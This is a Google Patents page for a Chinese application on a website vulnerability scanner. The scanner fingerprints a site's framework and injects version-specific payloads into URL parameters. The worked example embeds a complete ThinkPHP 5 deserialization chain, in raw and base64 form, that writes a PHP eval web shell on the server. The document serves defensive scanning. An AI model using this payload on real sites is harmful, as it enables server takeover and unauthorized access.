CN113312633A - Website vulnerability scanning method, device, equipment and storage medium - Google Patents
Website vulnerability scanning method, device, equipment and storage medium Download PDFInfo
- Publication number
- CN113312633A CN113312633A CN202110713874.1A CN202110713874A CN113312633A CN 113312633 A CN113312633 A CN 113312633A CN 202110713874 A CN202110713874 A CN 202110713874A CN 113312633 A CN113312633 A CN 113312633A
- Authority
- CN
- China
- Prior art keywords
- target
- website
- link address
- vulnerability
- frame
- Prior art date
- Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
- Pending
Links
Images
Classifications
-
- G—PHYSICS
- G06—COMPUTING; CALCULATING OR COUNTING
- G06F—ELECTRIC DIGITAL DATA PROCESSING
- G06F21/00—Security arrangements for protecting computers, components thereof, programs or data against unauthorised activity
- G06F21/50—Monitoring users, programs or devices to maintain the integrity of platforms, e.g. of processors, firmware or operating systems
- G06F21/57—Certifying or maintaining trusted computer platforms, e.g. secure boots or power-downs, version controls, system software checks, secure updates or assessing vulnerabilities
- G06F21/577—Assessing vulnerabilities and evaluating computer system security
-
- G—PHYSICS
- G06—COMPUTING; CALCULATING OR COUNTING
- G06F—ELECTRIC DIGITAL DATA PROCESSING
- G06F16/00—Information retrieval; Database structures therefor; File system structures therefor
- G06F16/90—Details of database functions independent of the retrieved data types
- G06F16/95—Retrieval from the web
- G06F16/951—Indexing; Web crawling techniques
Abstract
The application discloses a website vulnerability scanning method, which comprises the following steps: crawling a link address in a target website; identifying a target development frame of a target website and a target frame version of the target development frame; generating an available attack load corresponding to the vulnerability of the target frame version; updating the key-value pairs in each link address by using the available attack load; and determining whether the target website has a bug or not according to whether the execution effect of each updated link address is in line with the expectation or not. By applying the technical scheme provided by the application, whether the target website has the bug can be accurately determined, the accuracy of the website bug scanning result is improved, the false alarm rate is reduced, a user can repair the target website according to the accurate bug scanning result, and the safe operation of the target website is guaranteed. The application also discloses a website vulnerability scanning device, equipment and a storage medium, which have corresponding technical effects.
Description
Technical Field
The present application relates to the field of computer application technologies, and in particular, to a method, an apparatus, a device, and a storage medium for website vulnerability scanning.
Background
With the rapid development of computer technology and network technology, various websites are emerging continuously, which brings convenience to the work and life of people, and meanwhile, the security problem of the websites is concerned more and more. If the website has a bug, the website may be maliciously invaded to threaten the security operation of the website, so that the bug in the website needs to be scanned, and whether the bug exists in the website or not is known in time.
At present, a commonly used vulnerability scanning method is vulnerability scanning through version comparison. The vulnerability scanning mode is that firstly, components and versions used by a website are identified, and then all vulnerabilities under the versions are listed and provided for users by inquiring a vulnerability library.
By means of the method, vulnerability scanning is carried out, and false alarm conditions are easy to occur. For example, if a user only improves a component used by a website from a code side, completes bug fixing, and does not update a version, the version number of the component will not change.
Disclosure of Invention
The application aims to provide a website vulnerability scanning method, a website vulnerability scanning device, website vulnerability scanning equipment and a website vulnerability scanning storage medium, so that accuracy of website vulnerability scanning results is improved, and false alarm rate is reduced.
In order to solve the technical problem, the application provides the following technical scheme:
a website vulnerability scanning method comprises the following steps:
crawling a link address in a target website;
identifying a target development frame of the target website and a target frame version of the target development frame;
generating an available attack load corresponding to the vulnerability of the target frame version;
updating the key-value pairs in each link address by using the available attack load;
and determining whether the target website has a vulnerability or not according to whether the updated execution effect of each link address is in line with the expectation.
In a specific embodiment of the present application, the generating an available attack load corresponding to a vulnerability of the target framework version includes:
obtaining an original attack load corresponding to the vulnerability of the target frame version;
and coding the original attack load to generate an available attack load matched with the target development framework.
In a specific embodiment of the present application, the identifying a target development framework of the target website and a target framework version of the target development framework includes:
analyzing the webpage source code of the target website and the webpage source code corresponding to each crawled link address, and identifying a target development frame of the target website and a target frame version of the target development frame.
In a specific embodiment of the present application, the identifying a target development framework of the target website and a target framework version of the target development framework includes:
acquiring an error report page of the target website;
and identifying a target development frame of the target website and a target frame version of the target development frame based on the error reporting page.
In a specific embodiment of the present application, the updating the key-value pair in each link address by using the available attack payload includes:
aiming at each crawled link address, carrying out simulated click on the current link address to obtain a key value pair of the current link address;
and replacing the value in the key value pair of the current link address with the available attack load.
In a specific embodiment of the present application, determining whether the target website has a bug according to whether the updated execution effect of each link address meets expectations includes:
and if the execution effect of at least one updated link address is expected, determining that the target website has a vulnerability.
In one embodiment of the present application, the method further includes:
and under the condition that the target website has the vulnerability, storing the evidence, and generating and outputting a scanning result.
A website vulnerability scanning apparatus, comprising:
the link address crawling module is used for crawling a link address in a target website;
the development frame identification module is used for identifying a target development frame of the target website and a target frame version of the target development frame;
the attack load generation module is used for generating an available attack load corresponding to the vulnerability of the target frame version;
the link address updating module is used for updating the key value pair in each link address by using the available attack load;
and the vulnerability scanning module is used for determining whether the target website has a vulnerability or not according to whether the execution effect of each updated link address is in accordance with the expectation or not.
A website vulnerability scanning apparatus, comprising:
a memory for storing a computer program;
and the processor is used for realizing the steps of the website vulnerability scanning method when the computer program is executed.
A computer readable storage medium having a computer program stored thereon, the computer program, when executed by a processor, implementing the steps of any of the above website vulnerability scanning methods.
By applying the technical scheme provided by the embodiment of the application, after crawling the link address in the target website and identifying the target development frame of the target website and the target frame version of the target development frame, the available attack load corresponding to the vulnerability of the target frame version is generated, the key value pair in each link address is updated by using the available attack load, and whether the vulnerability exists in the target website is determined according to whether the execution result of each updated link address meets the expectation or not. The key value pair in each link address in the target website is updated through the available attack load corresponding to the vulnerability of the target frame version of the target development frame of the target website, the updated link address is executed again, whether the vulnerability exists in the target website can be accurately determined according to the fact that whether the execution result meets the expectation, the accuracy of website vulnerability scanning results is improved, the false alarm rate is reduced, a user can repair the target website according to the accurate vulnerability scanning results, and the safe operation of the target website is guaranteed.
Drawings
In order to more clearly illustrate the embodiments of the present application or the technical solutions in the prior art, the drawings used in the description of the embodiments or the prior art will be briefly described below, it is obvious that the drawings in the following description are only some embodiments of the present application, and for those skilled in the art, other drawings can be obtained according to the drawings without creative efforts.
FIG. 1 is a flowchart illustrating an exemplary implementation of a website vulnerability scanning method in an embodiment of the present disclosure;
FIG. 2 is a schematic structural diagram of a website vulnerability scanning apparatus in an embodiment of the present application;
fig. 3 is a schematic structural diagram of a website vulnerability scanning apparatus in an embodiment of the present application.
Detailed Description
The core of the application is to provide a website vulnerability scanning method. After crawling the link addresses in the target website and identifying the target development frame of the target website and the target frame version of the target development frame, generating available attack loads corresponding to the vulnerabilities of the target frame version, updating the key value pairs in each link address by using the available attack loads, and determining whether the vulnerability exists in the target website according to whether the execution result of each updated link address meets the expectation. The key value pair in each link address in the target website is updated through the available attack load corresponding to the vulnerability of the target frame version of the target development frame of the target website, the updated link address is executed again, whether the vulnerability exists in the target website can be accurately determined according to the fact that whether the execution result meets the expectation, the accuracy of website vulnerability scanning results is improved, the false alarm rate is reduced, a user can repair the target website according to the accurate vulnerability scanning results, and the safe operation of the target website is guaranteed.
In order that those skilled in the art will better understand the disclosure, the following detailed description will be given with reference to the accompanying drawings. It is to be understood that the embodiments described are only a few embodiments of the present application and not all embodiments. All other embodiments, which can be derived by a person skilled in the art from the embodiments given herein without making any creative effort, shall fall within the protection scope of the present application.
Referring to fig. 1, an implementation flowchart of a website vulnerability scanning method provided in the embodiment of the present application is shown, where the method may include the following steps:
s110: and crawling a link address in the target website.
The target website may be any website that has vulnerability scanning requirements. One or more link addresses, i.e., URLs (Uniform Resource locators), may exist in the target web site.
The link address in the target website can be crawled through a crawler. Specifically, the website domain name of the target website may be obtained first, the target website is accessed through the website domain name, and the crawling is performed on each level of directory of the target website to obtain the link address in the target website. All link addresses in the target website can be crawled quickly and efficiently by the crawler, and the link addresses comprise the link addresses transmitted by the parameters.
S120: a target development framework of a target website and a target framework version of the target development framework are identified.
The target website can be developed by utilizing a certain development framework, and the development framework exists in the target website in a component form. The component is the smallest unit of the asset comb. For example, a server asset may include various types of components, such as a browser-like component (IE (Internet Explorer, a Web browser), FireFox (FireFox browser), etc.), a Web server-like component (Weblogic (a middleware based on JAVAEE architecture), IIS (Internet Information Services), etc.), a Web development framework-like component (thinkph (a fast, compatible, and simple lightweight PHP (Pre Hypertext Preprocessor) development framework), CI (CodeIgniter, a small but powerful PHP framework), YII2 (a Web application development framework of high-performance PHP 5), etc.).
By analyzing the related information of the target website, such as fingerprint information, source code information, error reporting information and the like, the target development frame of the target website and the target frame version of the target development frame can be identified and obtained.
S130: and generating available attack load corresponding to the vulnerability of the target frame version.
One development frame can correspond to various vulnerabilities, and different frame versions of the same development frame can correspond to different vulnerabilities. By means of data acquisition, data analysis and the like, the vulnerability corresponding to each framework version of each development framework can be obtained in advance and recorded in the information base.
After the target development frame of the target website and the target frame version of the target development frame are identified, the vulnerability of the target frame version can be obtained through information base query. And generating available attack load corresponding to the vulnerability of the target frame version. The attack load, i.e., payload, is mainly used to establish a stable connection between the target machine and the attack machine, and return to a shell, and may also perform program injection, etc. The available attack load is an attack load used for fuzzing the target development framework.
S140: the key-value pairs in each link address are updated with the available attack payload.
One or more link addresses to the target website may be crawled by crawling link addresses in the target website, each link address having a respective key-value pair. The key-value pairs in each link address may be updated with the available attack payload.
S150: and determining whether the target website has a bug or not according to whether the execution effect of each updated link address is in line with the expectation or not.
The available attack load is an attack load used for fuzzing the target development framework. After the key-value pairs in each link address are updated with the available attack payload, each link address after updating may be re-executed. And then, according to whether the execution effect of each updated link address is in accordance with the expectation or not, whether the target website has a vulnerability or not can be determined. And if the execution effect of the updated link address is in accordance with the expectation, indicating that the target website can be executed with illegal operation by utilizing the corresponding vulnerability. In this case, it may be determined that the target website has a corresponding vulnerability. And if the execution effect of the updated link address is not in accordance with the expectation, indicating that the target website cannot be executed with illegal operation by utilizing the corresponding vulnerability. In this case, it may be determined that the target website does not have a corresponding vulnerability.
Specifically, if the execution effect of at least one updated link address meets expectations, it may be determined that a target website has a vulnerability, and if the execution effect of any updated link address does not meet expectations, it indicates that the target website does not have a vulnerability under the target framework version of the current target development framework.
It can be understood that the available attack load corresponds to a vulnerability of the target framework version, different vulnerabilities correspond to different available attack loads, after a key value pair in the link address is updated by using a certain available attack load, if the execution effect of at least one updated link address meets the expectation, it is indicated that the vulnerability corresponding to the available attack load exists in the target website, and the target website is subjected to relatively accurate principle scanning, so that an accurate vulnerability scanning result can be obtained.
By applying the method provided by the embodiment of the application, after crawling the link address in the target website and identifying the target development frame of the target website and the target frame version of the target development frame, the available attack load corresponding to the vulnerability of the target frame version is generated, the key value pair in each link address is updated by using the available attack load, and whether the vulnerability exists in the target website is determined according to whether the execution result of each updated link address meets the expectation or not. The key value pair in each link address in the target website is updated through the available attack load corresponding to the vulnerability of the target frame version of the target development frame of the target website, the updated link address is executed again, whether the vulnerability exists in the target website can be accurately determined according to the fact that whether the execution result meets the expectation, the accuracy of website vulnerability scanning results is improved, the false alarm rate is reduced, a user can repair the target website according to the accurate vulnerability scanning results, and the safe operation of the target website is guaranteed.
In one embodiment of the present application, step S130 may include the steps of:
the method comprises the following steps: obtaining an original attack load corresponding to a vulnerability of a target frame version;
step two: and encoding the original attack load to generate an available attack load matched with the target development framework.
For convenience of description, the above two steps are combined for illustration.
In the embodiment of the application, besides the loopholes corresponding to each framework version of each development framework, the information base can also record the original attack load corresponding to each loophole. The original attack load is not necessarily matched with the target development framework, so that after the original attack load corresponding to the vulnerability of the target framework version is obtained through information base query, the original attack load can be coded to generate an available attack load matched with the target development framework, namely the attack load for carrying out fuzzy test on the target development framework. Therefore, the fuzzy test of the target development framework can be dealt with, and the accuracy of vulnerability scanning is improved.
In one embodiment of the present application, step S120 may include the steps of:
and analyzing the webpage source code of the target website and the webpage source code corresponding to each crawled link address, and identifying a target development frame of the target website and a target frame version of the target development frame.
In the embodiment of the application, after the link addresses in the target website are crawled, the webpage source code corresponding to each link address can be further obtained, and meanwhile, the webpage source code of the target website can also be obtained. And analyzing the webpage source code of the target website and the webpage source code corresponding to each crawled link address, and identifying a target development frame of the target website and a target frame version of the target development frame according to an analysis result. Through the analysis of the webpage source codes, the target development frame of the target website and the target frame version of the target development frame can be quickly and accurately identified.
In one embodiment of the present application, step S120 may include the steps of:
the first step is as follows: acquiring an error reporting page of a target website;
the second step is that: and identifying a target development frame of the target website and a target frame version of the target development frame based on the error reporting page.
For convenience of description, the above two steps are combined for illustration.
In the embodiment of the application, when it is determined that vulnerability scanning is to be performed on a target website, an error report page of the target website can be obtained. The error pages of the target website can be collected in advance.
After the error page of the target website is obtained, the error page can be analyzed, and the target development frame of the target website and the target frame version of the target development frame can be quickly identified and obtained.
In one embodiment of the present application, step S140 may include the steps of:
the method comprises the following steps: aiming at each crawled link address, carrying out simulated click on the current link address to obtain a key value pair of the current link address;
step two: and replacing the value in the key value pair of the current link address with the available attack load.
For convenience of description, the above two steps are combined for illustration.
In the embodiment of the application, after crawling the link address in the target website, identifying the target development frame of the target website and the target frame version of the target development frame, and generating the available attack load corresponding to the vulnerability of the target frame version, the current link address can be clicked in a simulation mode aiming at each crawled link address, and the key value pair of the current link address is obtained. And performing corresponding operation on each crawled link address, wherein the current link address is the link address aimed by the current operation. If two link addresses are crawled together, when the current operation is directed at a first link address, the current link address is the first link address, the first link address is subjected to simulated clicking to obtain a key value pair of the first link address, when the current operation is directed at a second link address, the current link address is the second link address, and the second link address is subjected to simulated clicking to obtain a key value pair of the second link address.
After the key value pair of the current link address is obtained for each crawled link address, the value in the key value pair of the current link address can be replaced by the available attack load, and the current link address is updated. When the updated current link address is re-executed, the execution effect of the updated current link address can be used as a basis for judging whether the target website has a bug.
In an embodiment of the present application, in the case that it is determined that a target website has a vulnerability, the evidence may be saved, and a scan result may be generated and output. Therefore, the user can timely know whether the target website has the bugs or not according to the scanning result and which type of bugs exist, so that the bugs of the target website can be timely repaired, and the safety of the target website is guaranteed.
For convenience of understanding, the technical solutions provided in the embodiments of the present application are described in detail below by specific examples.
Acquiring a website domain name of a target website, such as localhost/example/think-5.0.24/public/index.
The crawler can also be used for obtaining the webpage source codes, analyzing the webpage source codes and identifying the target development frame of the target website and the target frame version of the target development frame. If the following contents exist in the webpage source code of the target website: and < p > ThinkPHP V5< br/>, the target website which can be obtained through analysis according to the content is a website developed by ThinkPHP, the target development framework is ThinkPHP, and the version of the target framework is V5.
All vulnerabilities of thinphp v5, namely the original attack load corresponding to each vulnerability, can be obtained by querying through a pre-established information base. For example, ThinkPHP v5 has an deserialization vulnerability with the original attack load:
O:27:"think\process\pipes\Windows":1:{s:34:"think\process\pipes\Windowsfiles";a:1:{i:0;O:17:"think\model\Pivot":3:{s:9:"*append";a:1:{s:3:"xxx";s:8:"getError";}s:8:"*error";O:27:"think\model\relation\HasOne":3:{s:15:"*selfRelation";i:0;s:11:"*bindAttr";a:1:{i:0;s:3:"xxx";}s:8:"*query";O:14:"think\db\Query":1:{s:8:"*model";O:20:"think\console\Output":2:{s:28:"think\console\Outputhandle";O:30:"think\session\driver\Memcached":1:{s:10:"*handler";O:23:"think\cache\driver\File":2:{s:10:"*options";a:5:{s:6:"expire";i:3600;s:12:"cache_subdir";b:0;s:6:"prefix";s:0:"";s:4:"path";s:122:"php://filter/convert.iconv.utf-8.utf-7|convert.base64-decode/resource=aaaPD9waHAgQGV2YWwoJF9QT1NUWydjY2MnXSk7Pz4g/../a.php";s:13:"data_compress";b:0;}s:6:"*tag";s:3:"xxx";}}s:9:"*styles";a:1:{i:0;s:7:"getAttr";}}}}s:6:"parent";r:11;}}}。
encoding the original attack load corresponding to each vulnerability of thinphp v5, such as base64 encoding, may generate a series of available attack loads matched with the target development framework for simulation testing. If the original attack load of the deserialization vulnerability is coded, the available attack load is obtained as follows:
TzoyNzoidGhpbmtccHJvY2Vzc1xwaXBlc1xXaW5kb3dzIjoxOntzOjM0OiIAdGhpbmtccHJvY2Vzc1xwaXBlc1xXaW5kb3dzAGZpbGVzIjthOjE6e2k6MDtPOjE3OiJ0aGlua1xtb2RlbFxQaXZvdCI6Mzp7czo5OiIAKgBhcHBlbmQiO2E6MTp7czozOiJ4eHgiO3M6ODoiZ2V0RXJyb3IiO31zOjg6IgAqAGVycm9yIjtPOjI3OiJ0aGlua1xtb2RlbFxyZWxhdGlvblxIYXNPbmUiOjM6e3M6MTU6IgAqAHNlbGZSZWxhdGlvbiI7aTowO3M6MTE6IgAqAGJpbmRBdHRyIjthOjE6e2k6MDtzOjM6Inh4eCI7fXM6ODoiACoAcXVlcnkiO086MTQ6InRoaW5rXGRiXFF1ZXJ5IjoxOntzOjg6IgAqAG1vZGVsIjtPOjIwOiJ0aGlua1xjb25zb2xlXE91dHB1dCI6Mjp7czoyODoiAHRoaW5rXGNvbnNvbGVcT3V0cHV0AGhhbmRsZSI7TzozMDoidGhpbmtcc2Vzc2lvblxkcml2ZXJcTWVtY2FjaGVkIjoxOntzOjEwOiIAKgBoYW5kbGVyIjtPOjIzOiJ0aGlua1xjYWNoZVxkcml2ZXJcRmlsZSI6Mjp7czoxMDoiACoAb3B0aW9ucyI7YTo1OntzOjY6ImV4cGlyZSI7aTozNjAwO3M6MTI6ImNhY2hlX3N1YmRpciI7YjowO3M6NjoicHJlZml4IjtzOjA6IiI7czo0OiJwYXRoIjtzOjEyMjoicGhwOi8vZmlsdGVyL2NvbnZlcnQuaWNvbnYudXRmLTgudXRmLTd8Y29udmVydC5iYXNlNjQtZGVjb2RlL3Jlc291cmNlPWFhYVBEOXdhSEFnUUdWMllXd29KRjlRVDFOVVd5ZGpZMk1uWFNrN1B6NGcvLi4vYS5waHAiO3M6MTM6ImRhdGFfY29tcHJlc3MiO2I6MDt9czo2OiIAKgB0YWciO3M6MzoieHh4Ijt9fXM6OToiACoAc3R5bGVzIjthOjE6e2k6MDtzOjc6ImdldEF0dHIiO319fX1zOjY6InBhcmVudCI7cjoxMTt9fX0=。
and crawling to link addresses such as https:// tajs. qq. com/statssId ═ 9347272 and http:// localhost/example/think-5.0.24/public/index.phppoc ═ 1, and performing simulated clicking on the link addresses to obtain the key-value pairs of each link address. If the key-value pair of the first link address is: key is sId, Value is 9347272, and the key-Value pair for the second link address is: key is poc and Value is 1.
And replacing the Value in the key Value pair of each analyzed link address by using an available attack load, re-executing the updated link address, and determining whether the target website has a bug or not according to the execution effect of the updated link address. Because each original attack load corresponds to a corresponding execution effect, for example, the execution effect corresponding to a certain original attack load is: and generating a shell file on the server, and after generating an available attack load based on the original attack load and updating the key value pair in the link address by using the available attack load, if the execution effect of the updated link address is that the corresponding shell file is generated, determining that the corresponding vulnerability exists at present.
In the case that the target website is determined to have a bug, the evidence may be saved, for example, the generated file may be stored in a screenshot mode, and then the scanning result may be generated and output.
Corresponding to the above method embodiments, the present application further provides a website vulnerability scanning apparatus, and the website vulnerability scanning apparatus described below and the website vulnerability scanning method described above may be referred to in a corresponding manner.
Referring to fig. 2, the apparatus may include the following modules:
a link address crawling module 210, configured to crawl link addresses in a target website;
the development frame identification module 220 is used for identifying a target development frame of a target website and a target frame version of the target development frame;
an attack load generation module 230, configured to generate an available attack load corresponding to a vulnerability of the target framework version;
a link address updating module 240 for updating the key-value pairs in each link address with the available attack payload;
and the vulnerability scanning module 250 is configured to determine whether a vulnerability exists in the target website according to whether the execution effect of each updated link address meets expectations.
By applying the device provided by the embodiment of the application, after crawling the link address in the target website and identifying the target development frame of the target website and the target frame version of the target development frame, the available attack load corresponding to the vulnerability of the target frame version is generated, the key value pair in each link address is updated by using the available attack load, and whether the vulnerability exists in the target website is determined according to whether the execution result of each updated link address meets the expectation or not. The key value pair in each link address in the target website is updated through the available attack load corresponding to the vulnerability of the target frame version of the target development frame of the target website, the updated link address is executed again, whether the vulnerability exists in the target website can be accurately determined according to the fact that whether the execution result meets the expectation, the accuracy of website vulnerability scanning results is improved, the false alarm rate is reduced, a user can repair the target website according to the accurate vulnerability scanning results, and the safe operation of the target website is guaranteed.
In a specific embodiment of the present application, the attack payload generation module 230 is configured to:
obtaining an original attack load corresponding to a vulnerability of a target frame version;
and encoding the original attack load to generate an available attack load matched with the target development framework.
In one embodiment of the present application, a framework identification module 220 is developed for:
and analyzing the webpage source code of the target website and the webpage source code corresponding to each crawled link address, and identifying a target development frame of the target website and a target frame version of the target development frame.
In one embodiment of the present application, a framework identification module 220 is developed for:
acquiring an error reporting page of a target website;
and identifying a target development frame of the target website and a target frame version of the target development frame based on the error reporting page.
In one embodiment of the present application, the link address updating module 240 is configured to:
aiming at each crawled link address, carrying out simulated click on the current link address to obtain a key value pair of the current link address;
and replacing the value in the key value pair of the current link address with the available attack load.
In an embodiment of the present application, the vulnerability scanning module 250 is configured to:
and if the execution effect of the at least one updated link address is expected, determining that the target website has a vulnerability.
In a specific embodiment of the present application, the apparatus further includes an evidence saving module and a scanning result output module, wherein:
the evidence storage module is used for storing the evidence under the condition that the target website has the bug;
and the scanning result output module is used for generating and outputting a scanning result.
Corresponding to the above method embodiment, an embodiment of the present application further provides a website vulnerability scanning device, including:
a memory for storing a computer program;
and the processor is used for realizing the steps of the website vulnerability scanning method when executing the computer program.
As shown in fig. 3, which is a schematic view of a composition structure of a website vulnerability scanning apparatus, the website vulnerability scanning apparatus may include: a processor 10, a memory 11, a communication interface 12 and a communication bus 13. The processor 10, the memory 11 and the communication interface 12 all communicate with each other through a communication bus 13.
In the embodiment of the present application, the processor 10 may be a Central Processing Unit (CPU), an application specific integrated circuit, a digital signal processor, a field programmable gate array or other programmable logic device, etc.
The processor 10 may call a program stored in the memory 11, and in particular, the processor 10 may perform operations in an embodiment of the website vulnerability scanning method.
The memory 11 is used for storing one or more programs, the program may include program codes, the program codes include computer operation instructions, in this embodiment, the memory 11 stores at least the program for implementing the following functions:
crawling a link address in a target website;
identifying a target development frame of a target website and a target frame version of the target development frame;
generating an available attack load corresponding to the vulnerability of the target frame version;
updating the key-value pairs in each link address by using the available attack load;
and determining whether the target website has a bug or not according to whether the execution effect of each updated link address is in line with the expectation or not.
In one possible implementation, the memory 11 may include a program storage area and a data storage area, wherein the program storage area may store an operating system, an application program required by at least one function (such as a web page crawling function and a web page parsing function), and the like; the storage data area can store data created in the using process, such as link address data, attack load data and the like.
Further, the memory 11 may include high speed random access memory, and may also include non-volatile memory, such as at least one magnetic disk storage device or other volatile solid state storage device.
The communication interface 12 may be an interface of a communication module for connecting with other devices or systems.
Of course, it should be noted that the structure shown in fig. 3 does not constitute a limitation on the website vulnerability scanning apparatus in the embodiment of the present application, and in practical applications, the website vulnerability scanning apparatus may include more or less components than those shown in fig. 3, or some components in combination.
Corresponding to the above method embodiments, the present application further provides a computer-readable storage medium, where a computer program is stored on the computer-readable storage medium, and when the computer program is executed by a processor, the steps of the website vulnerability scanning method are implemented.
The embodiments are described in a progressive manner, each embodiment focuses on differences from other embodiments, and the same or similar parts among the embodiments are referred to each other.
Those of skill would further appreciate that the various illustrative elements and algorithm steps described in connection with the embodiments disclosed herein may be implemented as electronic hardware, computer software, or combinations of both, and that the various illustrative components and steps have been described above generally in terms of their functionality in order to clearly illustrate this interchangeability of hardware and software. Whether such functionality is implemented as hardware or software depends upon the particular application and design constraints imposed on the implementation. Skilled artisans may implement the described functionality in varying ways for each particular application, but such implementation decisions should not be interpreted as causing a departure from the scope of the present application.
The steps of a method or algorithm described in connection with the embodiments disclosed herein may be embodied directly in hardware, in a software module executed by a processor, or in a combination of the two. A software module may reside in Random Access Memory (RAM), memory, Read Only Memory (ROM), electrically programmable ROM, electrically erasable programmable ROM, registers, hard disk, a removable disk, a CD-ROM, or any other form of storage medium known in the art.
The principle and the implementation of the present application are explained in the present application by using specific examples, and the above description of the embodiments is only used to help understanding the technical solution and the core idea of the present application. It should be noted that, for those skilled in the art, it is possible to make several improvements and modifications to the present application without departing from the principle of the present application, and such improvements and modifications also fall within the scope of the claims of the present application.
Claims (10)
1. A website vulnerability scanning method is characterized by comprising the following steps:
crawling a link address in a target website;
identifying a target development frame of the target website and a target frame version of the target development frame;
generating an available attack load corresponding to the vulnerability of the target frame version;
updating the key-value pairs in each link address by using the available attack load;
and determining whether the target website has a vulnerability or not according to whether the updated execution effect of each link address is in line with the expectation.
2. The website vulnerability scanning method according to claim 1, wherein the generating of the available attack load corresponding to the vulnerability of the target framework version comprises:
obtaining an original attack load corresponding to the vulnerability of the target frame version;
and coding the original attack load to generate an available attack load matched with the target development framework.
3. The website vulnerability scanning method of claim 1, wherein the identifying the target development framework of the target website and the target framework version of the target development framework comprises:
analyzing the webpage source code of the target website and the webpage source code corresponding to each crawled link address, and identifying a target development frame of the target website and a target frame version of the target development frame.
4. The website vulnerability scanning method of claim 1, wherein the identifying the target development framework of the target website and the target framework version of the target development framework comprises:
acquiring an error report page of the target website;
and identifying a target development frame of the target website and a target frame version of the target development frame based on the error reporting page.
5. The website vulnerability scanning method of claim 1, wherein the updating key-value pairs in each link address with the available attack payload comprises:
aiming at each crawled link address, carrying out simulated click on the current link address to obtain a key value pair of the current link address;
and replacing the value in the key value pair of the current link address with the available attack load.
6. The website vulnerability scanning method according to claim 1, wherein the determining whether the target website has a vulnerability according to whether the execution effect of each updated link address is expected comprises:
and if the execution effect of at least one updated link address is expected, determining that the target website has a vulnerability.
7. The website vulnerability scanning method according to any one of claims 1 to 6, further comprising:
and under the condition that the target website has the vulnerability, storing the evidence, and generating and outputting a scanning result.
8. A website vulnerability scanning device, comprising:
the link address crawling module is used for crawling a link address in a target website;
the development frame identification module is used for identifying a target development frame of the target website and a target frame version of the target development frame;
the attack load generation module is used for generating an available attack load corresponding to the vulnerability of the target frame version;
the link address updating module is used for updating the key value pair in each link address by using the available attack load;
and the vulnerability scanning module is used for determining whether the target website has a vulnerability or not according to whether the execution effect of each updated link address is in accordance with the expectation or not.
9. A website vulnerability scanning apparatus, comprising:
a memory for storing a computer program;
a processor for implementing the steps of the website vulnerability scanning method according to any of claims 1 to 7 when executing the computer program.
10. A computer-readable storage medium, having a computer program stored thereon, which, when being executed by a processor, carries out the steps of the website vulnerability scanning method according to any of claims 1 to 7.
Priority Applications (1)
| Application Number | Priority Date | Filing Date | Title |
|---|---|---|---|
| CN202110713874.1A CN113312633A (en) | 2021-06-25 | 2021-06-25 | Website vulnerability scanning method, device, equipment and storage medium |
Applications Claiming Priority (1)
| Application Number | Priority Date | Filing Date | Title |
|---|---|---|---|
| CN202110713874.1A CN113312633A (en) | 2021-06-25 | 2021-06-25 | Website vulnerability scanning method, device, equipment and storage medium |
Publications (1)
| Publication Number | Publication Date |
|---|---|
| CN113312633A true CN113312633A (en) | 2021-08-27 |
Family
ID=77380437
Family Applications (1)
| Application Number | Title | Priority Date | Filing Date |
|---|---|---|---|
| CN202110713874.1A Pending CN113312633A (en) | 2021-06-25 | 2021-06-25 | Website vulnerability scanning method, device, equipment and storage medium |
Country Status (1)
| Country | Link |
|---|---|
| CN (1) | CN113312633A (en) |
Cited By (2)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN113992378A (en) * | 2021-10-22 | 2022-01-28 | 绿盟科技集团股份有限公司 | Safety monitoring method and device, electronic equipment and storage medium |
| CN114785581A (en) * | 2022-04-14 | 2022-07-22 | 深圳开源互联网安全技术有限公司 | Attack load generation method and device and computer readable storage medium |
Citations (7)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN103632100A (en) * | 2013-11-08 | 2014-03-12 | 北京奇虎科技有限公司 | Method and device for detecting website bugs |
| CN104021074A (en) * | 2014-05-16 | 2014-09-03 | 北京金山安全软件有限公司 | Vulnerability detection method and device for application program of PhoneGap framework |
| CN107896219A (en) * | 2017-11-29 | 2018-04-10 | 深信服科技股份有限公司 | A kind of detection method, system and the relevant apparatus of website fragility |
| CN109933980A (en) * | 2019-02-28 | 2019-06-25 | 北京长亭科技有限公司 | A kind of vulnerability scanning method, apparatus and electronic equipment |
| CN109948334A (en) * | 2019-03-26 | 2019-06-28 | 深信服科技股份有限公司 | A kind of leak detection method, system and electronic equipment and storage medium |
| CN110995684A (en) * | 2019-11-26 | 2020-04-10 | 西安四叶草信息技术有限公司 | Vulnerability detection method and device |
| CN112579476A (en) * | 2021-02-23 | 2021-03-30 | 北京北大软件工程股份有限公司 | Method and device for aligning vulnerability and software and storage medium |
-
2021
- 2021-06-25 CN CN202110713874.1A patent/CN113312633A/en active Pending
Patent Citations (7)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN103632100A (en) * | 2013-11-08 | 2014-03-12 | 北京奇虎科技有限公司 | Method and device for detecting website bugs |
| CN104021074A (en) * | 2014-05-16 | 2014-09-03 | 北京金山安全软件有限公司 | Vulnerability detection method and device for application program of PhoneGap framework |
| CN107896219A (en) * | 2017-11-29 | 2018-04-10 | 深信服科技股份有限公司 | A kind of detection method, system and the relevant apparatus of website fragility |
| CN109933980A (en) * | 2019-02-28 | 2019-06-25 | 北京长亭科技有限公司 | A kind of vulnerability scanning method, apparatus and electronic equipment |
| CN109948334A (en) * | 2019-03-26 | 2019-06-28 | 深信服科技股份有限公司 | A kind of leak detection method, system and electronic equipment and storage medium |
| CN110995684A (en) * | 2019-11-26 | 2020-04-10 | 西安四叶草信息技术有限公司 | Vulnerability detection method and device |
| CN112579476A (en) * | 2021-02-23 | 2021-03-30 | 北京北大软件工程股份有限公司 | Method and device for aligning vulnerability and software and storage medium |
Cited By (4)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN113992378A (en) * | 2021-10-22 | 2022-01-28 | 绿盟科技集团股份有限公司 | Safety monitoring method and device, electronic equipment and storage medium |
| CN113992378B (en) * | 2021-10-22 | 2023-11-07 | 绿盟科技集团股份有限公司 | Security monitoring method and device, electronic equipment and storage medium |
| CN114785581A (en) * | 2022-04-14 | 2022-07-22 | 深圳开源互联网安全技术有限公司 | Attack load generation method and device and computer readable storage medium |
| CN114785581B (en) * | 2022-04-14 | 2023-08-11 | 深圳开源互联网安全技术有限公司 | Attack load generation method and device and computer readable storage medium |
Similar Documents
